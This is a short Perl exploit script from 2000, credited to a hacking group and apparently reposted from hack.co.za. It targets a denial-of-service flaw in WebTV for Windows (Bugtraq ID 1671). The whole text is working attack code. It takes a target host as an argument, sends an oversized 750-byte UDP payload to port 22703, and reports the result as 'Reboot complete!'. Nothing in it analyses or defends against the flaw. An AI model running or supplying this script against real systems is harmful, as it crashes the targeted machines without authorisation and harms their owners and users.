#!/usr/bin/perl # # Coded by:netsym and doom for rsh # http://www.8op.com/rsh # Denial of Service Vulnerability in WebTV for Windows discussed # on Bugtraq ID 1671 published on 9/12/2000 # Thanks to Andrew Griffiths,EvilClone,Datagram,Matic,initd_,0x7f,anarcho and Dethy use IO::Socket; use Getopt::Std; getopts('s:', \%args); if(!defined($args{s})){&usage; } $serv = $args{s}; $foo = "X"; $number = 750; $data .= $foo x $number; $EOL="\015\012"; $remote = IO::Socket::INET->new( Proto => "udp", PeerAddr => $args{s}, PeerPort => "(22703)", ) || die("Unable to connect to port 22703 on $args{s}\n"); $remote->autoflush(1); print $remote "$data". $EOL; while (<$remote>){ print } print("\nReboot complete!\n"); sub usage {die("\n$0 -s \n\n");} # www.hack.co.za [20 September 2000]#